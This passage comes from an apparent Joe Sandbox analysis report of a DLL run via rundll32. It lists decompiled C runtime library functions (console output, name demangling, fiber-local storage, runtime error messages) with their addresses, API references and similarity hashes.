						if((_t265 & 0x00000004) == 0) {
							_v33 =  *_t270;
							_t188 = E10024262(_t265);
							_t250 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t250 * 2)) - _t241;
							if( *((intOrPtr*)(_t188 + _t250 * 2)) >= _t241) {
								_push(1);
								_push(_t270);
								goto L26;
							} else {
								_t100 =  &(_t270[1]); // 0x1
								_t202 = _t100;
								_v56 = _t202;
								__eflags = _t202 - _v96;
								if(_t202 >= _v96) {
									_t265 = _v80;
									_t252 = _v44;
									 *((char*)(_t252 +  *((intOrPtr*)(0x1004e628 + _t265 * 4)) + 0x2e)) = _v33;
									 *(_t252 +  *((intOrPtr*)(0x1004e628 + _t265 * 4)) + 0x2d) =  *(_t252 +  *((intOrPtr*)(0x1004e628 + _t265 * 4)) + 0x2d) | 0x00000004;
									_t278 = _t274 + 1;
									goto L41;
								} else {
									_t206 = E1002C39D( &_v76, _t270, 2);
									_t288 = _t287 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L48;
									} else {
										_t270 = _v56;
										goto L27;
									}
								}
							}
						} else {
							_t265 = _t265 & 0x000000fb;
							_v24 =  *((intOrPtr*)(_t249 + _t186 + 0x2e));
							_v23 =  *_t270;
							_push(2);
							 *(_t249 + _v48 + 0x2d) = _t265;
							_push( &_v24);
							L26:
							_push( &_v76);
							_t190 = E1002C39D();
							_t288 = _t287 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L48;
							} else {
								goto L27;
							}
						}
						goto L49;
					}
				}
				L49:
				if(__eflags != 0) {
					_t183 = _v72;
					_t165 = _t183 + 0x350;
					 *_t165 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t165;
				}
				__eflags = _v8 ^ _t286;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E100037EA(_a4, _v8 ^ _t286, _t265);
			}

0x10032668
0x1003266f
0x10032672
0x1003267a
0x1003267d
0x1003268a
0x1003268d
0x10032690
0x10032697
0x1003269f
0x100326a2
0x100326a5
0x100326ab
0x100326ad
0x100326b4
0x100326be
0x100326c0
0x100326c3
0x100326c6
0x100326c9
0x100326cc
0x100326cf
0x100326d5
0x100329e0
0x100329e0
0x00000000
0x100326db
0x100326e3
0x100326e6
0x100326ec
0x100326ef
0x100326f6
0x100326fd
0x10032700
0x00000000
0x00000000
0x10032709
0x1003270e
0x10032710
0x10032713
0x10032718
0x1003271c
0x00000000
0x00000000
0x00000000
0x1003271c
0x10032721
0x10032723
0x10032728
0x100327e2
0x100327e9
0x100327ea
0x100327ed
0x100327ef
0x10032993
0x10032995
0x00000000
0x10032997
0x10032997
0x1003299a
0x100329a9
0x100329ad
0x100329ae
0x100329ae
0x00000000
0x100329b2
0x100327f5
0x100327f7
0x100327fd
0x10032800
0x1003280c
0x10032815
0x10032820
0x10032825
0x10032828
0x1003282b
0x00000000
0x10032831
0x10032831
0x00000000
0x10032831
0x1003282b
0x1003272e
0x1003273d
0x1003273e
0x10032741
0x10032744
0x10032749
0x1003295f
0x10032961
0x10032963
0x10032965
0x1003296f
0x10032977
0x10032979
0x1003297a
0x1003297e
0x10032981
0x10032981
0x10032985
0x10032985
0x10032985
0x10032988
0x10032988
0x10032988
0x1003298a
0x1003298a
0x1003298e
0x1003274f
0x1003274f
0x10032752
0x10032754
0x10032757
0x1003275a
0x1003275e
0x1003275f
0x10032763
0x10032766
0x1003276b
0x10032775
0x1003277a
0x1003277d
0x10032780
0x10032780
0x10032783
0x10032786
0x10032788
0x10032791
0x10032795
0x10032796
0x1003279a
0x100327a0
0x100327a9
0x100327b6
0x100327bd
0x100327c1
0x100327cc
0x100327d1
0x100327d7
0x00000000
0x100327dd
0x10032834
0x10032835
0x100328b8
0x100328bf
0x100328c7
0x100328cf
0x100328d4
0x100328d7
0x100328dc
0x00000000
0x100328e2
0x100328f7
0x100329d7
0x100329dd
0x00000000
0x100328fd
0x10032906
0x10032908
0x1003290e
0x00000000
0x10032914
0x10032918
0x1003294e
0x10032951
0x00000000
0x10032957
0x10032957
0x00000000
0x10032957
0x1003291a
0x1003291c
0x1003291e
0x10032937
0x00000000
0x1003293d
0x10032941
0x00000000
0x10032947
0x10032947
0x1003294a
0x1003294b
0x00000000
0x1003294b
0x10032941
0x10032937
0x10032918
0x1003290e
0x100328f7
0x100328dc
0x100327d7
0x10032749
0x00000000
0x10032839
0x10032839
0x1003283d
0x10032840
0x10032862
0x10032865
0x1003286a
0x1003286e
0x10032872
0x100328a0
0x100328a2
0x00000000
0x10032874
0x10032874
0x10032874
0x10032877
0x1003287a
0x1003287d
0x100329b4
0x100329b7
0x100329c4
0x100329cf
0x100329d4
0x00000000
0x10032883
0x1003288a
0x1003288f
0x10032892
0x10032895
0x00000000
0x1003289b
0x1003289b
0x00000000
0x1003289b
0x10032895
0x1003287d
0x10032842
0x10032846
0x10032849
0x1003284e
0x10032854
0x10032856
0x1003285d
0x100328a3
0x100328a6
0x100328a7
0x100328ac
0x100328af
0x100328b2
0x00000000
0x00000000
0x00000000
0x00000000
0x100328b2
0x00000000
0x10032840
0x100326db
0x100329e3
0x100329e3
0x100329e5
0x100329e8
0x100329e8
0x100329e8
0x100329e8
0x100329fa
0x100329fc
0x100329fd
0x100329fe
0x10032a08

APIs

GetConsoleOutputCP.KERNEL32 ref: 100326A5
__fassign.LIBCMT ref: 1003288A
__fassign.LIBCMT ref: 100328A7
WriteFile.KERNEL32(?,1002B316,00000000,?,00000000), ref: 100328EF
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 1003292F
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 100329D7

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: ab72a4d4d4db616047fe8542db00a9b766c0f473b3a544cf343a404f0bd2b147
Instruction ID: a8bb8432d5e3edc8eb75f8d90f54bae1a245339a155dc0d31e03c7975ac7510e
Opcode Fuzzy Hash: ab72a4d4d4db616047fe8542db00a9b766c0f473b3a544cf343a404f0bd2b147
Instruction Fuzzy Hash: 91C1AC75D052988FDB12CFA8C980AEDBBF5EF09314F29416AE855FB341D631AD42CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000CDCE, Relevance: 9.1, APIs: 6, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000CDCE(intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				char _v12;
				char _v20;
				char _v28;
				char _v36;
				intOrPtr _t27;
				char* _t29;
				intOrPtr _t38;
				char* _t39;
				void* _t48;
				intOrPtr* _t55;
				intOrPtr* _t65;
				intOrPtr _t67;
				char _t73;
				intOrPtr* _t75;
				void* _t77;
				void* _t78;

				_t55 = _a8;
				_t78 = _t77 - 0x20;
				_t75 = _a4;
				 *_t75 =  *_t55;
				_t27 =  *((intOrPtr*)(_t55 + 4));
				 *((intOrPtr*)(_t75 + 4)) = _t27;
				if(_t27 <= 1) {
					_t29 =  *0x1004e004; // 0x0
					if( *_t29 == 0) {
						E100076A6(E100072DE( &_v36, 1),  &_v12, _t75);
						 *_t75 = _v12;
						 *((intOrPtr*)(_t75 + 4)) = _v8;
					} else {
						E10009A99( &_v12);
						_t65 = E100076A6(E100076C8( &_v12,  &_v20, 0x20),  &_v28, _t75);
						 *_t75 =  *_t65;
						_t38 =  *((intOrPtr*)(_t65 + 4));
						 *((intOrPtr*)(_t75 + 4)) = _t38;
						if(_t38 <= 1) {
							_t39 =  *0x1004e004; // 0x0
							if( *_t39 == 0x40) {
								L19:
								 *0x1004e004 = _t39 + 1;
							} else {
								_v12 = "{for ";
								_v8 = 5;
								while(1) {
									L5:
									E10007748(_t75,  &_v12);
									_t67 =  *((intOrPtr*)(_t75 + 4));
									_t39 =  *0x1004e004; // 0x0
									while(_t67 <= 1) {
										_t73 =  *_t39;
										if(_t73 == 0) {
											L15:
											if( *_t39 == 0) {
												E100078B0(_t75, 1);
											}
											E100077F7(_t75, 0x7d);
											_t39 =  *0x1004e004; // 0x0
										} else {
											if(_t73 == 0x40) {
												if(_t67 <= 1) {
													goto L15;
												}
											} else {
												_t48 = E10007637(_t67,  &_v20, 0x60, E1000B7FB(_t73,  &_v28));
												_t78 = _t78 + 0x10;
												E100077A0(_t75, E100076C8(_t48,  &_v36, 0x27));
												_t39 =  *0x1004e004; // 0x0
												if( *_t39 == 0x40) {
													_t39 = _t39 + 1;
													 *0x1004e004 = _t39;
												}
												_t67 =  *((intOrPtr*)(_t75 + 4));
												if(_t67 <= 1) {
													if( *_t39 == 0x40) {
														continue;
													} else {
														_v12 = "s ";
														_v8 = 2;
														goto L5;
													}
													goto L21;
												}
											}
										}
										break;
									}
									if( *_t39 == 0x40) {
										goto L19;
									}
									goto L21;
								}
							}
						}
					}
				}
				L21:
				return _t75;
			}

0x1000cdd1
0x1000cdd4
0x1000cddb
0x1000cde1
0x1000cde3
0x1000cde6
0x1000cdeb
0x1000cdf1
0x1000cdf9
0x1000cf0e
0x1000cf16
0x1000cf1b
0x1000cdff
0x1000ce03
0x1000ce23
0x1000ce27
0x1000ce29
0x1000ce2c
0x1000ce31
0x1000ce37
0x1000ce3f
0x1000cef6
0x1000cef7
0x1000ce45
0x1000ce45
0x1000ce4c
0x1000ce53
0x1000ce53
0x1000ce59
0x1000ce5e
0x1000ce61
0x1000ce66
0x1000ce6e
0x1000ce72
0x1000ced6
0x1000ced9
0x1000cede
0x1000cede
0x1000cee7
0x1000ceec
0x1000ce74
0x1000ce77
0x1000ced4
0x00000000
0x00000000
0x1000ce79
0x1000ce89
0x1000ce8e
0x1000cea1
0x1000cea6
0x1000ceae
0x1000ceb0
0x1000ceb1
0x1000ceb1
0x1000ceb6
0x1000cebb
0x1000cec0
0x00000000
0x1000cec2
0x1000cec2
0x1000cec9
0x00000000
0x1000cec9
0x00000000
0x1000cec0
0x1000cebb
0x1000ce77
0x00000000
0x1000ce72
0x1000cef4
0x00000000
0x00000000
0x00000000
0x1000cef4
0x1000ce53
0x1000ce3f
0x1000ce31
0x1000cdf9
0x1000cf1e
0x1000cf23

APIs

DName::operator+.LIBCMT ref: 1000CE12
DName::operator+.LIBCMT ref: 1000CE1E

Part of subcall function 10007748: shared_ptr.LIBCMT ref: 10007764

DName::operator+=.LIBCMT ref: 1000CEDE

Part of subcall function 1000B7FB: DName::operator+.LIBCMT ref: 1000B866
Part of subcall function 1000B7FB: DName::operator+.LIBCMT ref: 1000BB24

Part of subcall function 10007637: DName::operator+.LIBCMT ref: 10007658

DName::operator+.LIBCMT ref: 1000CE99

Part of subcall function 100077A0: DName::operator=.LIBVCRUNTIME ref: 100077C1

DName::DName.LIBVCRUNTIME ref: 1000CF02
DName::operator+.LIBCMT ref: 1000CF0E

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Name::operator+$NameName::Name::operator+=Name::operator=shared_ptr
String ID:
API String ID: 2795783184-0
Opcode ID: b3c0250ec6442521a444e263139a1f28894b159fc94599326b5b3a5d3a642c08
Instruction ID: 2463ad79b5e98d84085c04d8798126b1c143ff2480c819560cb4cfdd011bf85e
Opcode Fuzzy Hash: b3c0250ec6442521a444e263139a1f28894b159fc94599326b5b3a5d3a642c08
Instruction Fuzzy Hash: BD41E6B4A04388AFFB10CFA8C995FAE7BEAEB05380F400058F58AE7295D7356D40C759

Uniqueness

Uniqueness Score: -1.00%

Function 1000BBAD, Relevance: 9.1, APIs: 6, Instructions: 95
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E1000BBAD(void* __edx, void* __eflags, intOrPtr* _a4) {
				char _v8;
				char _v12;
				char _v20;
				char _v28;
				char _v36;
				intOrPtr* _t25;
				intOrPtr _t26;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t37;
				char _t39;
				intOrPtr _t40;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr* _t60;

				_t60 = _a4;
				 *_t60 = 0;
				 *((intOrPtr*)(_t60 + 4)) = 0;
				_t25 = E1000CF24(__edx,  &_v12, 1, 0);
				_t40 =  *_t25;
				 *_t60 = _t40;
				_t26 =  *((intOrPtr*)(_t25 + 4));
				 *((intOrPtr*)(_t60 + 4)) = _t26;
				_t27 =  *0x1004e004; // 0x0
				_t39 = 2;
				if(_t26 != 0) {
					L4:
					_t57 =  *_t27;
					if(_t57 != 0x40) {
						if(_t57 == 0) {
							_push(1);
							if(_t40 != 0) {
								_v12 = "::";
								_v8 = _t39;
								_t30 = E100076A6(E10007684(E100072DE( &_v36),  &_v28,  &_v12),  &_v20, _t60);
								 *_t60 =  *_t30;
								 *((intOrPtr*)(_t60 + 4)) =  *((intOrPtr*)(_t30 + 4));
							} else {
								E10007596(_t60);
							}
						} else {
							 *((intOrPtr*)(_t60 + 4)) = 0;
							 *((char*)(_t60 + 4)) = _t39;
							 *_t60 = 0;
						}
						L11:
						return _t60;
					}
					L5:
					 *0x1004e004 = _t27 + 1;
					goto L11;
				}
				_t58 =  *_t27;
				if(_t58 == 0) {
					goto L4;
				}
				if(_t58 == 0x40) {
					goto L5;
				} else {
					_v12 = "::";
					_v8 = _t39;
					_t37 = E100076A6(E10007684(E1000B7FB(_t58,  &_v20),  &_v28,  &_v12),  &_v36, _t60);
					_t40 =  *_t37;
					 *_t60 = _t40;
					 *((intOrPtr*)(_t60 + 4)) =  *((intOrPtr*)(_t37 + 4));
					_t27 =  *0x1004e004; // 0x0
					goto L4;
				}
			}

0x1000bbb8
0x1000bbc2
0x1000bbc4
0x1000bbc7
0x1000bbcf
0x1000bbd1
0x1000bbd3
0x1000bbda
0x1000bbdd
0x1000bbe2
0x1000bbe3
0x1000bc2e
0x1000bc2e
0x1000bc33
0x1000bc3f
0x1000bc4b
0x1000bc4f
0x1000bc5d
0x1000bc64
0x1000bc82
0x1000bc89
0x1000bc8e
0x1000bc51
0x1000bc53
0x1000bc53
0x1000bc41
0x1000bc41
0x1000bc44
0x1000bc47
0x1000bc47
0x1000bc92
0x1000bc97
0x1000bc97
0x1000bc35
0x1000bc36
0x00000000
0x1000bc36
0x1000bbe5
0x1000bbe9
0x00000000
0x00000000
0x1000bbee
0x00000000
0x1000bbf0
0x1000bbf3
0x1000bbfb
0x1000bc1a
0x1000bc1f
0x1000bc21
0x1000bc26
0x1000bc29
0x00000000
0x1000bc29

APIs

Part of subcall function 1000CF24: Replicator::operator[].LIBVCRUNTIME ref: 1000CF61

DName::operator=.LIBVCRUNTIME ref: 1000BC53

Part of subcall function 1000B7FB: DName::operator+.LIBCMT ref: 1000B866
Part of subcall function 1000B7FB: DName::operator+.LIBCMT ref: 1000BB24

DName::operator+.LIBCMT ref: 1000BC0E
DName::operator+.LIBCMT ref: 1000BC1A
DName::DName.LIBVCRUNTIME ref: 1000BC67
DName::operator+.LIBCMT ref: 1000BC76
DName::operator+.LIBCMT ref: 1000BC82

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]
String ID:
API String ID: 955152517-0
Opcode ID: ba662b15bb985ebfbfb305bd6482890fa435d1f000153196af6ea9912e697c85
Instruction ID: 27af3a92f5b1fd040e2588c0fddfed7d18473ac67e6e21bd44ed062d0c5557d9
Opcode Fuzzy Hash: ba662b15bb985ebfbfb305bd6482890fa435d1f000153196af6ea9912e697c85
Instruction Fuzzy Hash: C031DCB5A00605AFEB18CF98D991DEEBBF9EF59380F00445DE58BA7341DB35AA44CB04

Uniqueness

Uniqueness Score: -1.00%

Function 10005A4B, Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E10005A4B(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x1004d060 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E1000D892(_t13, __eflags,  *0x1004d060);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E1000D8CD(_t14, __eflags,  *0x1004d060, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E10012164();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E1000D8CD(_t18, __eflags,  *0x1004d060, 0);
								} else {
									_t8 = E1000D8CD(_t18, __eflags,  *0x1004d060, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E10011FAC(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

0x10005a4b
0x10005a52
0x10005a65
0x10005a6c
0x10005a6e
0x10005a6f
0x10005a72
0x10005a8b
0x10005a8b
0x10005a74
0x10005a74
0x10005a76
0x10005a80
0x10005a87
0x10005a89
0x10005a90
0x10005a99
0x10005a9c
0x10005a9d
0x10005a9f
0x10005ab3
0x10005ab3
0x10005abc
0x10005aa1
0x10005aa8
0x10005aae
0x10005aaf
0x10005ab1
0x10005ac5
0x10005ac7
0x10005ac7
0x00000000
0x00000000
0x00000000
0x10005ab1
0x10005aca
0x00000000
0x00000000
0x00000000
0x10005a89
0x10005a76
0x10005ad2
0x10005adc
0x10005a54
0x10005a56
0x10005a56

APIs

GetLastError.KERNEL32(00000001,?,1000526E,10003561,10003963,?,10003B9B,?,00000001,?,?,00000001,?,1004AF30,0000000C,10003C9D), ref: 10005A59
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10005A67
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10005A80
SetLastError.KERNEL32(00000000,10003B9B,?,00000001,?,?,00000001,?,1004AF30,0000000C,10003C9D,?,00000001,?), ref: 10005AD2

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: b498b394295ad5cc3aedbd174fed718b54ab898f492b61d3cd737d6b5173fc23
Instruction ID: 7db28cdefa02e9f84fa3800d6371fd0a77151277f221630a79e8ae18b089995f
Opcode Fuzzy Hash: b498b394295ad5cc3aedbd174fed718b54ab898f492b61d3cd737d6b5173fc23
Instruction Fuzzy Hash: 53012436349322AEF714F7B06CC5A1B3B84EB036F2B20033BF510860E9EF229C119665

Uniqueness

Uniqueness Score: -1.00%

Function 10038FA4, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E10038FA4(void* __ebx, signed short* __edx, void* __esi, void* __eflags, intOrPtr _a4) {
				signed short* _v0;
				signed int _v8;
				signed int _v12;
				char _v13;
				void _v512;
				long _v516;
				void* __edi;
				signed int _t17;
				signed int _t26;
				char* _t31;
				signed short* _t34;
				void* _t35;
				void* _t36;
				signed int _t39;
				signed int _t42;

				_t35 = __esi;
				_t34 = __edx;
				_t39 = _t42;
				if(E1003B6E1(3) == 1 || __eax == 0 &&  *0x1004e888 == 1) {
					_pop(_t39);
					_push(_t39);
					_t40 = _t42;
					_t17 =  *0x1004d054; // 0xd94e5c04
					_v8 = _t17 ^ _t42;
					_push(_t35);
					_t36 = GetStdHandle(0xfffffff4);
					if(_t36 != 0 && _t36 != 0xffffffff) {
						_t34 = _v0;
						_t31 =  &_v512;
						while(1) {
							 *_t31 =  *_t34;
							_t31 = _t31 + 1;
							if(_t31 ==  &_v12) {
								break;
							}
							_t26 =  *_t34 & 0x0000ffff;
							_t34 =  &(_t34[1]);
							if(_t26 != 0) {
								continue;
							}
							break;
						}
						_v13 = 0;
						_v516 = 0;
						_t19 = WriteFile(_t36,  &_v512, _t31 -  &_v512 - 1,  &_v516, 0);
					}
					return E100037EA(_t19, _v12 ^ _t40, _t34);
				} else {
					_push(__esi);
					__eax = E10028A30(0x1004e890, 0x314, L"Runtime Error!\n\nProgram: ");
					__ebx = 0;
					if(__eax != 0) {
						L21:
						__eax = E1000E341();
						asm("int3");
						__eax =  *0x1004e888; // 0x0
						return __eax;
					} else {
						_push(__edi);
						__esi = 0x1004e8c2;
						 *0x1004eaca = __ax;
						__eax = GetModuleFileNameW(0, 0x1004e8c2, 0x104);
						__edi = 0x2fb;
						if(__eax != 0 || E10028A30(0x1004e8c2, 0x2fb, L"<program name unknown>") == 0) {
							_t10 = __esi + 2; // 0x1004e8c4
							__ecx = _t10;
							do {
								__ax =  *__esi;
								__esi = __esi + 2;
							} while (__ax != __bx);
							__esi = __esi - __ecx;
							__esi = __esi >> 1;
							_t11 = __esi + 1; // 0x1004e8c1
							__eax = _t11;
							if(_t11 <= 0x3c) {
								L17:
								__edi = 0x314;
								__esi = 0x1004e890;
								if(E1002F999(0x1004e890, 0x314, L"\n\n") != 0) {
									goto L21;
								} else {
									__eax = E1002F999(0x1004e890, 0x314, _a4);
									_pop(__edi);
									if(__eax != 0) {
										goto L21;
									} else {
										_push(L"Microsoft Visual C++ Runtime Library");
										__eax = E1003B8C9(__ecx, 0x1004e890);
										_pop(__esi);
										__ebx = 0x12010;
										_pop(__ebp);
										return __eax;
									}
								}
							} else {
								_push(3);
								_t12 = __esi - 0x3b; // 0x1004e885
								__eax = _t12;
								__edi = __edi - __eax;
								__eax =  &(0x1004e8c2[__eax]);
								if(__eax != 0) {
									goto L21;
								} else {
									goto L17;
								}
							}
						} else {
							goto L21;
						}
					}
				}
			}

0x10038fa4
0x10038fa4
0x10038fa7
0x10038fb4
0x100390a8
0x10038f2b
0x10038f2c
0x10038f34
0x10038f3b
0x10038f3e
0x10038f47
0x10038f4b
0x10038f52
0x10038f55
0x10038f5b
0x10038f5d
0x10038f5f
0x10038f65
0x00000000
0x00000000
0x10038f67
0x10038f6a
0x10038f70
0x00000000
0x00000000
0x00000000
0x10038f70
0x10038f75
0x10038f78
0x10038f91
0x10038f91
0x10038fa3
0x10038fcb
0x10038fcc
0x10038fdc
0x10038fe4
0x10038fe8
0x100390ae
0x100390b3
0x100390b8
0x100390b9
0x100390be
0x10038fee
0x10038fee
0x10038ff4
0x10038ff9
0x10039001
0x10039007
0x1003900e
0x10039027
0x10039027
0x1003902a
0x1003902a
0x1003902d
0x10039030
0x10039035
0x10039037
0x10039039
0x10039039
0x1003903f
0x10039062
0x10039067
0x1003906c
0x1003907d
0x00000000
0x1003907f
0x10039084
0x1003908c
0x1003908f
0x00000000
0x10039091
0x10039096
0x1003909c
0x100390a4
0x100390a5
0x100390a6
0x100390a7
0x100390a7
0x1003908f
0x10039041
0x10039041
0x10039043
0x10039043
0x10039046
0x10039048
0x10039060
0x00000000
0x00000000
0x00000000
0x00000000
0x10039060
0x00000000
0x00000000
0x00000000
0x1003900e
0x10038fe8

APIs

GetModuleFileNameW.KERNEL32(00000000,1004E8C2,00000104), ref: 10039001

Strings

Runtime Error!Program: , xrefs: 10038FCD
..., xrefs: 1003904F
<program name unknown>, xrefs: 10039010
Microsoft Visual C++ Runtime Library, xrefs: 10039096

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: FileModuleName
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 514040917-4022980321
Opcode ID: 978fa5827ac3f20c3a5892375d5cf1e429f3470c3e46e072c65876f1f59388a5
Instruction ID: afe29cdb41c4ee65c3bb8b902ab9bfe68787d4c676a15ac55f3717a69dda071b
Opcode Fuzzy Hash: 978fa5827ac3f20c3a5892375d5cf1e429f3470c3e46e072c65876f1f59388a5
Instruction Fuzzy Hash: E0216B76E003863EE326D2209C85E9B278CCF823C6F510439FD08DA142FB62DE05C1E9

Uniqueness

Uniqueness Score: -1.00%

Function 10027AD5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10027AD5(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E10028BDD(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E10028BDD(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E10024468(GetLastError());
									_t17 =  *((intOrPtr*)(E1002449E(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E10027C17(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E10024468(GetLastError());
						_t17 =  *((intOrPtr*)(E1002449E(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E10027C17(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E10027C59(_a8);
				return 0;
			}

0x10027adb
0x10027ae0
0x10027af4
0x10027af7
0x10027b29
0x10027b31
0x10027b33
0x10027b4c
0x10027b4f
0x10027b52
0x10027b60
0x10027b6f
0x10027b77
0x10027b79
0x10027b92
0x10027b95
0x10027b95
0x10027b7b
0x10027b82
0x10027b8d
0x10027b8d
0x10027b97
0x10027b98
0x00000000
0x10027b98
0x10027b57
0x10027b5c
0x10027b5e
0x00000000
0x00000000
0x00000000
0x10027b5e
0x10027b3c
0x10027b47
0x00000000
0x10027b47
0x10027af9
0x10027afc
0x10027aff
0x10027b12
0x10027b15
0x10027b17
0x10027b19
0x00000000
0x10027b19
0x10027b05
0x10027b0a
0x10027b0c
0x00000000
0x00000000
0x00000000
0x10027b0c
0x10027ae5
0x00000000

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 10027ADA

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

